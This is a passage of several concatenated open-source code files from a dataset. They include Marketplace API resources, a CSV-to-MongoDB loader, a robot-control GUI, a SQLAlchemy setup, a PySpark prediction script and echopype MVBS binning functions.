is_packaged=form.is_packaged)\n AddonUser(addon=bundle.obj, user=request.amo_user).save()\n\n self._icons_and_images(bundle.obj)\n record_action('app-submitted', request, {'app-id': bundle.obj.pk})\n\n log.info('App created: %s' % bundle.obj.pk)\n return bundle\n\n def log_throttled_access(self, request):\n \"\"\"\n Only throttle POST requests.\n \"\"\"\n if request.method == 'POST':\n super(AppResource, self).log_throttled_access(request)\n\n def _icons_and_images(self, bundle_obj):\n pipeline = TaskTree()\n pipeline.push(tasks.fetch_icon, args=[bundle_obj])\n pipeline.apply_async()\n\n @write\n def obj_get(self, request=None, **kwargs):\n obj = self.get_and_check_ownership(request, allow_anon=True, **kwargs)\n log.info('App retreived: %s' % obj.pk)\n return obj\n\n def devices(self, data):\n with no_translation():\n names = dict([(n.api_name, n.id)\n for n in DEVICE_TYPES.values()])\n filtered = [names.get(n, n) for n in data.get('device_types', [])]\n return {'device_types': filtered}\n\n def formset(self, data):\n cats = data.pop('categories', [])\n return {'form-TOTAL_FORMS': 1,\n 'form-INITIAL_FORMS': 1,\n 'form-MAX_NUM_FORMS': '',\n 'form-0-categories': cats}\n\n def get_and_check_ownership(self, request, allow_anon=False, **kwargs):\n try:\n # Use queryset, not get_object_list to ensure a distinction\n # between a 404 and a 403.\n obj = self._meta.queryset.get(**kwargs)\n except self._meta.object_class.DoesNotExist:\n unavail = self._meta.queryset_base.filter(**kwargs)\n if unavail.exists():\n obj = unavail[0]\n # Owners can see their app no matter what region.\n if AppOwnerAuthorization().is_authorized(request, object=obj):\n return obj\n data = {}\n for key in ('name', 'support_email', 'support_url'):\n value = getattr(obj, key)\n data[key] = unicode(value) if value else ''\n raise http_error(HttpLegallyUnavailable,\n 'Not available in your region.',\n extra_data=data)\n raise http_error(http.HttpNotFound,\n 'No such app.')\n\n # If it's public, just return it.\n if allow_anon and obj.is_public():\n return obj\n\n # Now do the final check to see if you are allowed to see it and\n # return a 403 if you can't.\n if not AppOwnerAuthorization().is_authorized(request, object=obj):\n raise 
http_error(http.HttpForbidden,\n 'You do not own that app.')\n return obj\n\n @write\n @transaction.commit_on_success\n def obj_delete(self, request, **kwargs):\n app = self.get_and_check_ownership(request, **kwargs)\n app.delete('Removed via API')\n\n @write\n @transaction.commit_on_success\n def obj_update(self, bundle, request, **kwargs):\n data = bundle.data\n obj = self.get_and_check_ownership(request, **kwargs)\n bundle.obj = obj\n data['app_slug'] = data.get('app_slug', obj.app_slug)\n data.update(self.formset(data))\n data.update(self.devices(data))\n self.update_premium_type(bundle)\n\n# TODO: renable when regions are sorted out.\n# if 'regions' in data:\n# data['regions'] = [REGIONS_DICT[r['slug']].id for r in data['regions']\n# if r.get('slug') in REGIONS_DICT]\n\n forms = [AppDetailsBasicForm(data, instance=obj, request=request),\n DeviceTypeForm(data, addon=obj),\n# RegionForm(data, product=obj),\n CategoryFormSet(data, addon=obj, request=request),\n CategoryForm({'categories': data['form-0-categories']})]\n\n valid = all([f.is_valid() for f in forms])\n if not valid:\n raise self.form_errors(forms)\n forms[0].save(obj)\n forms[1].save(obj)\n forms[2].save()\n# forms[3].save()\n log.info('App updated: %s' % obj.pk)\n\n return bundle\n\n def update_premium_type(self, bundle):\n self.hydrate_premium_type(bundle)\n if bundle.obj.premium_type in (amo.ADDON_FREE, amo.ADDON_FREE_INAPP):\n return\n\n ap = AddonPremium.objects.safer_get_or_create(addon=bundle.obj)[0]\n if not bundle.data.get('price') or not Price.objects.filter(\n price=bundle.data['price']).exists():\n tiers = ', '.join('\"%s\"' % p.price\n for p in Price.objects.exclude(price=\"0.00\"))\n raise fields.ApiFieldError(\n 'Premium app specified without a valid price. Price can be'\n ' one of %s.' 
% (tiers,))\n else:\n ap.price = Price.objects.get(price=bundle.data['price'])\n ap.save()\n\n def dehydrate(self, bundle):\n obj = bundle.obj\n amo_user = getattr(bundle.request, 'amo_user', None)\n region = (bundle.request.REGION.id if hasattr(bundle.request, 'REGION')\n else None)\n bundle.data.update(app_to_dict(obj, region=region, profile=amo_user,\n request=bundle.request))\n bundle.data['privacy_policy'] = (\n PrivacyPolicyResource().get_resource_uri(bundle))\n\n self.dehydrate_extra(bundle)\n return bundle\n\n def dehydrate_extra(self, bundle):\n if bundle.obj.upsold:\n bundle.data['upsold'] = self.get_resource_uri(bundle.obj.upsold.free)\n\n def hydrate_premium_type(self, bundle):\n typ = amo.ADDON_PREMIUM_API_LOOKUP.get(bundle.data['premium_type'],\n None)\n if typ is None:\n raise fields.ApiFieldError(\n \"premium_type should be one of 'free', 'premium', 'free-inapp'\"\n \", 'premium-inapp', or 'other'.\")\n bundle.obj.premium_type = typ\n\n def get_object_list(self, request):\n if not request.amo_user:\n log.info('Anonymous listing not allowed')\n raise http_error(http.HttpForbidden,\n 'Anonymous listing not allowed.')\n return self._meta.queryset.filter(type=amo.ADDON_WEBAPP,\n authors=request.amo_user)\n\n def override_urls(self):\n return [\n urls.url(\n r\"^%s/(?P\\d+)/(?Pprivacy)%s$\" %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('get_privacy_policy'),\n name=\"api_dispatch_detail\"),\n urls.url(\n r\"^%s/(?P[^/<>\\\"']+)/\"\n r\"(?Pprivacy)%s$\" %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('get_privacy_policy'),\n name=\"api_dispatch_detail\"),\n ]\n\n def get_privacy_policy(self, request, **kwargs):\n return PrivacyPolicyResource().dispatch('detail', request, **kwargs)\n\n\nclass PrivacyPolicyResource(CORSResource, MarketplaceModelResource):\n\n class Meta(MarketplaceResource.Meta):\n api_name = 'apps'\n queryset = Webapp.objects.all() # Gets overriden in dispatch.\n fields = ['privacy_policy']\n detail_allowed_methods = ['get', 'put']\n always_return_data = True\n authentication = OptionalOAuthAuthentication()\n authorization = AppOwnerAuthorization()\n resource_name = 'privacy'\n serializer = Serializer(formats=['json'])\n slug_lookup = 'app_slug'\n # Throttle users without Apps:APIUnthrottled at 10 POST requests/day.\n throttle = CacheThrottle(throttle_at=10, timeframe=60 * 60 * 24)\n\n\nclass CategorySerializer(ModelSerializer):\n name = CharField('name')\n resource_uri = HyperlinkedIdentityField(view_name='app-category-detail')\n\n class Meta:\n model = Category\n fields = ('name', 'id', 'resource_uri', 'slug')\n view_name = 'category'\n\n\nclass CategoryViewSet(ListModelMixin, RetrieveModelMixin, CORSMixin,\n GenericViewSet):\n model = Category\n serializer_class = CategorySerializer\n permission_classes = (AllowAny,)\n cors_allowed_methods = ('get',)\n slug_lookup = 'slug'\n\n def get_queryset(self):\n qs = Category.objects.filter(type=amo.ADDON_WEBAPP,\n weight__gte=0)\n if self.action == 'list':\n qs = qs.filter(Q(region__isnull=True) |\n Q(region=get_region_id()))\n # Check carrier.\n carrier = get_carrier_id()\n carrier_f = Q(carrier__isnull=True)\n if carrier:\n carrier_f |= Q(carrier=carrier)\n qs = qs.filter(carrier_f)\n return qs.order_by('-carrier', '-region', '-weight')\n\n\ndef waffles(request):\n switches = ['in-app-sandbox', 'allow-refund', 'buchets', 'rocketfuel']\n flags = ['allow-b2g-paid-submission', 'override-region-exclusion']\n res = dict([s, waffle.switch_is_active(s)] for s in switches)\n 
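Back in get_and_check_ownership above, three outcomes are distinguished: a plain 404 when the app does not exist at all, a legally-unavailable error when it exists but is excluded in the caller's region (owners exempt), and a 403 when it is visible but not owned by the caller; the public-app shortcut is left out here. A distilled, framework-free sketch of that decision tree (all names are illustrative stand-ins):

# Distilled 404 / legally-unavailable / 403 flow from get_and_check_ownership
# (exception classes and arguments are illustrative stand-ins).
class NotFound(Exception): pass
class LegallyUnavailable(Exception): pass
class Forbidden(Exception): pass

def check_app(app_id, all_ids, region_visible_ids, owned_ids):
    if app_id not in all_ids:
        raise NotFound(app_id)            # truly absent -> 404
    if app_id not in region_visible_ids:
        if app_id in owned_ids:
            return app_id                 # owners see their app in any region
        raise LegallyUnavailable(app_id)  # exists, but excluded in this region
    if app_id not in owned_ids:
        raise Forbidden(app_id)           # exists and visible, but not yours -> 403
    return app_id

# Owner bypasses the region exclusion:
print(check_app(7, all_ids={7, 8}, region_visible_ids={8}, owned_ids={7}))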
res.update(dict([f, waffle.flag_is_active(request, f)] for f in flags))\n return res\n\n\n@memoize(prefix='config-settings')\ndef get_settings():\n safe = debug.get_safe_settings()\n _settings = ['SITE_URL']\n return dict([k, safe[k]] for k in _settings)\n\n\nclass ConfigResource(CORSResource, MarketplaceResource):\n \"\"\"\n A resource that is designed to be exposed externally and contains\n settings or waffle flags that might be relevant to the client app.\n \"\"\"\n version = fields.CharField()\n flags = fields.DictField('flags')\n settings = fields.DictField('settings')\n\n class Meta(MarketplaceResource.Meta):\n detail_allowed_methods = ['get']\n list_allowed_methods = []\n resource_name = 'config'\n\n def obj_get(self, request, **kw):\n if kw['pk'] != 'site':\n raise http_error(http.HttpNotFound,\n 'No such configuration.')\n\n return GenericObject({\n # This is the git commit on IT servers.\n 'version': getattr(settings, 'BUILD_ID_JS', ''),\n 'flags': waffles(request),\n 'settings': get_settings(),\n })\n\n\nclass RegionResource(CORSResource, MarketplaceResource):\n name = fields.CharField('name')\n slug = fields.CharField('slug')\n id = fields.IntegerField('id')\n default_currency = fields.CharField('default_currency')\n default_language = fields.CharField('default_language')\n has_payments = fields.BooleanField('has_payments')\n ratingsbodies = fields.ListField('ratingsbodies')\n\n class Meta(MarketplaceResource.Meta):\n detail_allowed_methods = ['get']\n list_allowed_methods = ['get']\n resource_name = 'region'\n slug_lookup = 'slug'\n\n def dehydrate_ratingsbodies(self, bundle):\n return [rb.name for rb in bundle.obj.ratingsbodies]\n\n def obj_get_list(self, request=None, **kwargs):\n return REGIONS_DICT.values()\n\n def obj_get(self, request=None, **kwargs):\n return REGIONS_DICT.get(kwargs['pk'], None)\n\n\nclass CarrierResource(CORSResource, MarketplaceResource):\n name = fields.CharField('name')\n slug = fields.CharField('slug')\n id = fields.IntegerField('id')\n\n class Meta(MarketplaceResource.Meta):\n detail_allowed_methods = ['get']\n list_allowed_methods = ['get']\n resource_name = 'carrier'\n slug_lookup = 'slug'\n\n def dehydrate_ratingsbodies(self, bundle):\n return [rb.name for rb in bundle.obj.ratingsbodies]\n\n def obj_get_list(self, request=None, **kwargs):\n return CARRIERS\n\n def obj_get(self, request=None, **kwargs):\n return CARRIER_MAP.get(kwargs['pk'], None)\n\n\n@api_view(['POST'])\n@permission_classes([AllowAny])\ndef error_reporter(request):\n request._request.CORS = ['POST']\n client = raven.base.Client(settings.SENTRY_DSN)\n client.capture('raven.events.Exception', data=request.DATA)\n return Response(status=204)\n\n\nclass RefreshManifestViewSet(GenericViewSet, CORSMixin):\n model = Webapp\n permission_classes = (AllowAppOwner, AllowReviewerReadOnly)\n cors_allowed_methods = ('post',)\n slug_lookup = 'app_slug'\n\n def detail_post(self, request, **kwargs):\n obj = self.get_object()\n self.check_object_permissions(request, obj)\n if obj.is_packaged:\n return Response(\n status=400,\n data={'reason': 'App is a packaged app.'})\n _update_manifest(obj.pk, True, {})\n return Response(status=204)\n\n\nclass EnumeratedField(ChoiceField):\n\n def from_native(self, value):\n for k, v in self.choices:\n if value == v:\n return k\n\n def to_native(self, key):\n for k, v in self.choices:\n if key == k:\n return v\n\n\nclass PriceTierSerializer(ModelSerializer):\n resource_uri = HyperlinkedIdentityField(view_name='price-tier-detail')\n active = BooleanField()\n 
name = CharField()\n    method = EnumeratedField(PAYMENT_METHOD_CHOICES)\n    price = DecimalField()\n\n    class Meta:\n        model = Price\n        fields = ['resource_uri', 'active', 'name', 'method', 'price']\n\n\nclass PriceTierViewSet(generics.CreateAPIView,\n                       generics.RetrieveUpdateDestroyAPIView,\n                       ModelViewSet):\n    permission_classes = [GroupPermission('Admin', '%')]\n    authentication_classes = [RestOAuthAuthentication]\n    serializer_class = PriceTierSerializer\n    model = Price\n\n\nclass PriceCurrencySerializer(ModelSerializer):\n    resource_uri = HyperlinkedIdentityField(view_name='price-currency-detail')\n    tier = HyperlinkedRelatedField(view_name='price-tier-detail')\n    currency = CharField()\n    carrier = CharField(required=False)\n    price = DecimalField()\n    provider = EnumeratedField(PROVIDER_CHOICES)\n    method = EnumeratedField(PAYMENT_METHOD_CHOICES)\n\n    class Meta:\n        model = PriceCurrency\n        fields = ['resource_uri', 'tier', 'currency', 'carrier',\n                  'price', 'provider', 'method']\n\n\nclass PriceCurrencyViewSet(ModelViewSet):\n    permission_classes = [GroupPermission('Admin', '%')]\n    authentication_classes = [RestOAuthAuthentication]\n    serializer_class = PriceCurrencySerializer\n    model = PriceCurrency\n    filter_fields = ('tier', 'provider', 'currency', 'price')\n\n    def post_save(self, obj, created):\n        log.info('Price %s %s.' % (obj, 'created' if created else 'updated'))\n\n    def destroy(self, request, *args, **kwargs):\n        obj = self.get_object()\n        obj.delete()\n        log.info('Price %s deleted.' % (obj,))\n        return Response(status=204)\n","sub_path":"mkt/api/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":20372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"538878751","text":"from pymongo import MongoClient\r\nfrom pprint import pprint\r\nprint(\"Enter your mongo string\")\r\naddress=input()\r\nclient = MongoClient(address)\r\ndb=client['thedata']\r\ncollect=db['collection']\r\n\r\nfield=[]\r\nwith open(\"field.csv\") as infile:\r\n\tfor line in infile:\r\n\t\tword=line.split(',')\r\n\t\tfield.append(word[1])\r\nfield.pop(0)\r\n\r\nlistdict=[]\r\n\r\nwith open(\"data.csv\") as infile:\r\n\tfor line in infile:\r\n\t\tword=line.split(',')\r\n\t\trecord={}\r\n\t\tfor i in range(0,len(field)):\r\n\t\t\ttry:\r\n\t\t\t\trecord[field[i]]=int(word[i].strip('\\n'))\r\n\t\t\texcept:\r\n\t\t\t\trecord[field[i]]=word[i].strip('\\n') #collect.insert_one(record)\r\n\t\tlistdict.append(record)\r\n\t\tif len(listdict) ==1000:\r\n\t\t\tcollect.insert_many(listdict)\r\n\t\t\tlistdict.clear()\r\n\r\n\r\n# flush the remainder; insert_many raises on an empty document list\r\nif listdict:\r\n\tcollect.insert_many(listdict)\r\n\tlistdict.clear()\r\n","sub_path":"dataload.py","file_name":"dataload.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"61845698","text":"\nimport tkinter\nfrom tkinter import ttk\nimport mqtt_remote_method_calls as com\n\n\ndef main():\n    \"\"\" Constructs and runs a GUI for this program. \"\"\"\n    root = tkinter.Tk()\n\n    mqtt_client = com.MqttClient()\n    mqtt_client.connect_to_ev3()\n\n    setup_gui(root, mqtt_client)\n\n    root.mainloop()\n\n\ndef setup_gui(root_window, mqtt_client):\n    \"\"\" Constructs and sets up widgets on the given window. 
\"\"\"\n frame = ttk.Frame(root_window, padding=10)\n frame.grid()\n\n speed_entry_box = ttk.Entry(frame)\n go_forward_button = ttk.Button(frame, text=\"Go forward\")\n\n speed_entry_box.grid()\n go_forward_button.grid()\n\n go_forward_button['command'] = \\\n lambda: handle_go_forward(speed_entry_box, mqtt_client)\n\n\ndef handle_go_forward(entry_box, mqtt_client):\n \"\"\"\n Tells the robot to go forward at the speed specified in the given entry box.\n \"\"\"\n speed_string = entry_box.get()\n mqtt_client.send_message('go_forward', [speed_string])\n print('Sending the go_forward message with speed', speed_string)\n\n\nmain()\n","sub_path":"src/capstone_2_runs_on_laptop.py","file_name":"capstone_2_runs_on_laptop.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"268370595","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# @Time : 2018/6/6 17:50\n# @Author : yuangn\n# @File : models.py\n# @Software: PyCharm\n\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\nfrom qsdatacenter.settings import *\n\ndb_session = scoped_session(sessionmaker(autocommit=False,\n autoflush=False,\n bind=ENGINE_RDB))\nBase = declarative_base()\nBase.query = db_session.query_property()\n\ndef init_db():\n # import all modules here that might define models so that\n # they will be registered properly on the metadata. Otherwise\n # you will have to import them first before calling init_db()\n Base.metadata.create_all(bind=ENGINE_RDB)","sub_path":"qsdatacenter/datamodel/orm/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"308809540","text":"#!/opt/conda/envs/dsenv/bin/python\n\nimport os\nimport sys\n\nSPARK_HOME = \"/usr/hdp/current/spark2-client\"\nPYSPARK_PYTHON = \"/opt/conda/envs/dsenv/bin/python\"\nos.environ[\"PYSPARK_PYTHON\"]= PYSPARK_PYTHON\nos.environ[\"SPARK_HOME\"] = SPARK_HOME\n\nPYSPARK_HOME = os.path.join(SPARK_HOME, \"python/lib\")\nsys.path.insert(0, os.path.join(PYSPARK_HOME, \"py4j-0.10.7-src.zip\"))\nsys.path.insert(0, os.path.join(PYSPARK_HOME, \"pyspark.zip\"))\n\n\nfrom pyspark.sql import SparkSession\nfrom pyspark import SparkConf\n\nspark = SparkSession.builder.getOrCreate()\nspark.sparkContext.setLogLevel('WARN')\nconf = SparkConf()\n\nfrom pyspark.ml import Pipeline, PipelineModel\n\nmodel = PipelineModel.load(sys.argv[1])\npath = sys.argv[2]\ntest = spark.read.json(path)\npredictions = model.transform(test)\n\npredictions.select(\"id\",\"prediction\").write.parquet(sys.argv[3], mode=\"overwrite\")\n","sub_path":"projects/4/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"73305069","text":"\"\"\"\nContains core functions needed to compute the MVBS of an input dataset.\n\"\"\"\n\nimport warnings\nfrom typing import Tuple, Union\n\nimport dask.array\nimport numpy as np\nimport xarray as xr\n\n\ndef get_bin_indices(\n echo_range: np.ndarray, bins_er: np.ndarray, times: np.ndarray, bins_time: np.ndarray\n) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"\n Obtains the bin index of ``echo_range`` and ``times`` based\n on the binning ``bins_er`` and ``bins_time``, respectively.\n\n Parameters\n ----------\n echo_range: np.ndarray\n 2D array of echo range values\n bins_er: 
np.ndarray\n 1D array (used by np.digitize) representing the binning required for ``echo_range``\n times: np.ndarray\n 1D array corresponding to the time values that should be binned\n bins_time: np.ndarray\n 1D array (used by np.digitize) representing the binning required for ``times``\n\n Returns\n -------\n digitized_echo_range: np.ndarray\n 2D array of bin indices for ``echo_range``\n bin_time_ind: np.ndarray\n 1D array of bin indices for ``times``\n \"\"\"\n\n # get bin index for each echo range value\n digitized_echo_range = np.digitize(echo_range, bins_er, right=False)\n\n # turn datetime into integers, so we can use np.digitize\n if isinstance(times, dask.array.Array):\n times_i8 = times.compute().data.view(\"i8\")\n else:\n times_i8 = times.view(\"i8\")\n\n # turn datetime into integers, so we can use np.digitize\n bins_time_i8 = bins_time.view(\"i8\")\n\n # get bin index for each time\n bin_time_ind = np.digitize(times_i8, bins_time_i8, right=False)\n\n return digitized_echo_range, bin_time_ind\n\n\ndef bin_and_mean_echo_range(\n arr: Union[np.ndarray, dask.array.Array], digitized_echo_range: np.ndarray, n_bin_er: int\n) -> Union[np.ndarray, dask.array.Array]:\n \"\"\"\n Bins and means ``arr`` with respect to the ``echo_range`` bins.\n\n Parameters\n ----------\n arr: np.ndarray or dask.array.Array\n 2D array (dimension: [``echo_range`` x ``ping_time``]) to bin along ``echo_range``\n and compute mean of each bin\n digitized_echo_range: np.ndarray\n 2D array of bin indices for ``echo_range``\n n_bin_er: int\n The number of echo range bins\n\n Returns\n -------\n er_means: np.ndarray or dask.array.Array\n 2D array representing the bin and mean of ``arr`` along ``echo_range``\n \"\"\"\n\n binned_means = []\n for bin_er in range(1, n_bin_er):\n # Catch a known warning that can occur, which does not impact the results\n with warnings.catch_warnings():\n # ignore warnings caused by taking a mean of an array filled with NaNs\n warnings.filterwarnings(action=\"ignore\", message=\"Mean of empty slice\")\n\n # bin and mean echo_range dimension\n er_selected_data = np.nanmean(arr[:, digitized_echo_range == bin_er], axis=1)\n\n # collect all echo_range bins\n binned_means.append(er_selected_data)\n\n # create full echo_range binned array\n er_means = np.vstack(binned_means)\n\n return er_means\n\n\ndef get_unequal_rows(mat: np.ndarray, row: np.ndarray) -> np.ndarray:\n \"\"\"\n Obtains those row indices of ``mat`` that are not equal\n to ``row``.\n\n Parameters\n ----------\n mat: np.ndarray\n 2D array with the same column dimension as the number\n of elements in ``row``\n row: np.ndarray\n 1D array with the same number of element elements as\n the column dimension of ``mat``\n\n Returns\n -------\n row_ind_not_equal: np.ndarray\n The row indices of ``mat`` that are not equal to ``row``\n\n Notes\n -----\n Elements with NaNs are considered equal if they are in the same position.\n \"\"\"\n\n # compare row against all rows in mat (allowing for NaNs to be equal)\n element_nan_equal = (mat == row) | (np.isnan(mat) & np.isnan(row))\n\n # determine if mat row is equal to row\n row_not_equal = np.logical_not(np.all(element_nan_equal, axis=1))\n\n if isinstance(row_not_equal, dask.array.Array):\n row_not_equal = row_not_equal.compute()\n\n # get those row indices that are not equal to row\n row_ind_not_equal = np.argwhere(row_not_equal).flatten()\n\n return row_ind_not_equal\n\n\ndef if_all_er_steps_identical(er_chan: Union[xr.DataArray, np.ndarray]) -> bool:\n \"\"\"\n A comprehensive check that 
determines if all ``echo_range`` values\n along ``ping_time`` have the same step size. If they do not have\n the same step sizes, then grouping of the ``echo_range`` values\n will be necessary.\n\n Parameters\n ----------\n er_chan: xr.DataArray or np.ndarray\n 2D array containing the ``echo_range`` values for each ``ping_time``\n\n Returns\n -------\n bool\n True, if grouping of ``echo_range`` along ``ping_time`` is necessary, otherwise False\n\n Notes\n -----\n ``er_chan`` should have rows corresponding to ``ping_time`` and columns\n corresponding to ``range_sample``\n \"\"\"\n\n # grab the in-memory numpy echo_range values, if necessary\n if isinstance(er_chan, xr.DataArray):\n er_chan = er_chan.values\n\n # grab the first ping_time that is not filled with NaNs\n ping_index = 0\n while np.all(np.isnan(er_chan[ping_index, :])):\n ping_index += 1\n\n # determine those rows of er_chan that are not equal to the row ping_index\n unequal_ping_ind = get_unequal_rows(er_chan, er_chan[ping_index, :])\n\n if len(unequal_ping_ind) > 0:\n # see if all unequal_ping_ind are filled with NaNs\n all_nans = np.all(np.all(np.isnan(er_chan[unequal_ping_ind, :]), axis=1))\n\n if all_nans:\n # All echo_range values have the same step size\n return False\n else:\n # Some echo_range values have different step sizes\n return True\n else:\n # All echo_range values have the same step size\n return False\n\n\ndef if_last_er_steps_identical(er_chan: Union[xr.DataArray, np.ndarray]) -> bool:\n \"\"\"\n An alternative (less comprehensive) check that determines if all\n ``echo_range`` values along ``ping_time`` have the same step size.\n If they do not have the same step sizes, then grouping of the\n ``echo_range`` values will be necessary.\n\n Parameters\n ----------\n er_chan: xr.DataArray or np.ndarray\n 2D array containing the ``echo_range`` values for each ``ping_time``\n\n Returns\n -------\n bool\n True, if grouping of ``echo_range`` along ``ping_time`` is necessary, otherwise False\n\n Notes\n -----\n It is possible that this method will incorrectly determine if grouping\n is necessary.\n\n ``er_chan`` should have rows corresponding to ``ping_time`` and columns\n corresponding to ``range_sample``\n \"\"\"\n\n # determine the number of NaNs in each ping and find the unique number of NaNs\n unique_num_nans = np.unique(np.isnan(er_chan.data).sum(axis=1))\n\n # compute the results, if necessary, to allow for downstream checks\n if isinstance(unique_num_nans, dask.array.Array):\n unique_num_nans = unique_num_nans.compute()\n\n # determine if any value is not 0 or er_chan.shape[1]\n unexpected_num_nans = False in np.logical_or(\n unique_num_nans == 0, unique_num_nans == er_chan.shape[1]\n )\n\n if unexpected_num_nans:\n # echo_range varies with ping_time\n return True\n else:\n # make sure that the final echo_range value for each ping_time is the same (account for NaN)\n num_non_nans = np.logical_not(np.isnan(np.unique(er_chan.data[:, -1]))).sum()\n\n # compute the results, if necessary, to allow for downstream checks\n if isinstance(num_non_nans, dask.array.Array):\n num_non_nans = num_non_nans.compute()\n\n if num_non_nans > 1:\n # echo_range varies with ping_time\n return True\n else:\n # echo_range does not vary with ping_time\n return False\n\n\ndef is_er_grouping_needed(\n echo_range: Union[xr.DataArray, np.ndarray], comprehensive_er_check: bool\n) -> bool:\n \"\"\"\n Determines if ``echo_range`` values along ``ping_time`` can change and\n thus need to be grouped.\n\n Parameters\n ----------\n echo_range: 
xr.DataArray or np.ndarray\n 2D array containing the ``echo_range`` values for each ``ping_time``\n comprehensive_er_check: bool\n If True, a more comprehensive check will be completed to determine if ``echo_range``\n grouping along ``ping_time`` is needed, otherwise a less comprehensive check will be done\n\n Returns\n -------\n bool\n If True grouping of ``echo_range`` will be required, else it will not\n be necessary\n \"\"\"\n\n if comprehensive_er_check:\n return if_all_er_steps_identical(echo_range)\n else:\n return if_last_er_steps_identical(echo_range)\n\n\ndef group_dig_er_bin_mean_echo_range(\n arr: Union[np.ndarray, dask.array.Array],\n digitized_echo_range: Union[np.ndarray, dask.array.Array],\n n_bin_er: int,\n) -> Union[np.ndarray, dask.array.Array]:\n \"\"\"\n Groups the rows of ``arr`` such that they have the same corresponding\n row values in ``digitized_echo_range``, then applies ``bin_and_mean_echo_range``\n on each group, and lastly assembles the correctly ordered ``er_means`` array\n representing the bin and mean of ``arr`` with respect to ``echo_range``.\n\n Parameters\n ----------\n arr: dask.array.Array or np.ndarray\n The 2D array whose values should be binned\n digitized_echo_range: dask.array.Array or np.ndarray\n 2D array of bin indices for ``echo_range``\n n_bin_er: int\n The number of echo range bins\n\n Returns\n -------\n er_means: dask.array.Array or np.ndarray\n The bin and mean of ``arr`` with respect to ``echo_range``\n \"\"\"\n\n # compute bin indices to allow for downstream processes (mainly axis argument in unique)\n if isinstance(digitized_echo_range, dask.array.Array):\n digitized_echo_range = digitized_echo_range.compute()\n\n # determine the unique rows of digitized_echo_range and the inverse\n unique_er_bin_ind, unique_inverse = np.unique(digitized_echo_range, axis=0, return_inverse=True)\n\n # create groups of row indices using the unique inverse\n grps_same_ind = [\n np.argwhere(unique_inverse == grp).flatten() for grp in np.unique(unique_inverse)\n ]\n\n # for each group bin and mean arr along echo_range\n # note: the values appended may not be in the correct final order\n binned_er = []\n for count, grp in enumerate(grps_same_ind):\n binned_er.append(\n bin_and_mean_echo_range(arr[grp, :], unique_er_bin_ind[count, :], n_bin_er)\n )\n\n # construct er_means and put the columns in the correct order\n binned_er_array = np.hstack(binned_er)\n correct_column_ind = np.argsort(np.concatenate(grps_same_ind))\n er_means = binned_er_array[:, correct_column_ind]\n\n return er_means\n\n\ndef bin_and_mean_2d(\n arr: Union[dask.array.Array, np.ndarray],\n bins_time: np.ndarray,\n bins_er: np.ndarray,\n times: np.ndarray,\n echo_range: np.ndarray,\n comprehensive_er_check: bool = True,\n) -> np.ndarray:\n \"\"\"\n Bins and means ``arr`` based on ``times`` and ``echo_range``,\n and their corresponding bins. 
If ``arr`` is ``Sv`` then this\n will compute the MVBS.\n\n Parameters\n ----------\n arr: dask.array.Array or np.ndarray\n The 2D array whose values should be binned\n bins_time: np.ndarray\n 1D array (used by np.digitize) representing the binning required for ``times``\n bins_er: np.ndarray\n 1D array (used by np.digitize) representing the binning required for ``echo_range``\n times: np.ndarray\n 1D array corresponding to the time values that should be binned\n echo_range: np.ndarray\n 2D array of echo range values\n comprehensive_er_check: bool\n If True, a more comprehensive check will be completed to determine if ``echo_range``\n grouping along ``ping_time`` is needed, otherwise a less comprehensive check will be done\n\n Returns\n -------\n final_reduced: np.ndarray\n The final binned and mean ``arr``, if ``arr`` is ``Sv`` then this is the MVBS\n\n Notes\n -----\n This function assumes that ``arr`` has rows corresponding to\n ``ping_time`` and columns corresponding to ``echo_range``.\n\n This function should not be run if the number of ``echo_range`` values\n vary amongst ``ping_times``. This should not occur for our current use\n of echopype-generated Sv data.\n \"\"\"\n\n # get the number of echo range and time bins\n n_bin_er = len(bins_er)\n n_bin_time = len(bins_time)\n\n # obtain the bin indices for echo_range and times\n digitized_echo_range, bin_time_ind = get_bin_indices(echo_range, bins_er, times, bins_time)\n\n # determine if grouping of echo_range values with the same step size is necessary\n er_grouping_needed = is_er_grouping_needed(echo_range, comprehensive_er_check)\n\n if er_grouping_needed:\n # groups, bins, and means arr with respect to echo_range\n er_means = group_dig_er_bin_mean_echo_range(arr, digitized_echo_range, n_bin_er)\n else:\n # bin and mean arr with respect to echo_range\n er_means = bin_and_mean_echo_range(arr, digitized_echo_range[0, :], n_bin_er)\n\n # if er_means is a dask array we compute it so the graph does not get too large\n if isinstance(er_means, dask.array.Array):\n er_means = er_means.compute()\n\n # create final reduced array i.e. 
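bin_and_mean_2d ultimately rests on np.digitize plus a per-bin nanmean; a tiny synthetic demo of that binning step, with arbitrary values:

# Minimal illustration of the digitize-then-nanmean step behind bin_and_mean_2d.
import numpy as np

values = np.array([0.5, 1.5, 2.5, np.nan, 3.5])
edges = np.array([0.0, 2.0, 4.0])          # two bins: [0, 2) and [2, 4)
bin_ind = np.digitize(values, edges, right=False)
valid = ~np.isnan(values)                  # NaN digitizes past the last edge
for b in (1, 2):
    in_bin = valid & (bin_ind == b)
    mean = np.nanmean(values[in_bin]) if in_bin.any() else np.nan
    print('bin', b, '->', mean)            # bin 1 -> 1.0, bin 2 -> 3.0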
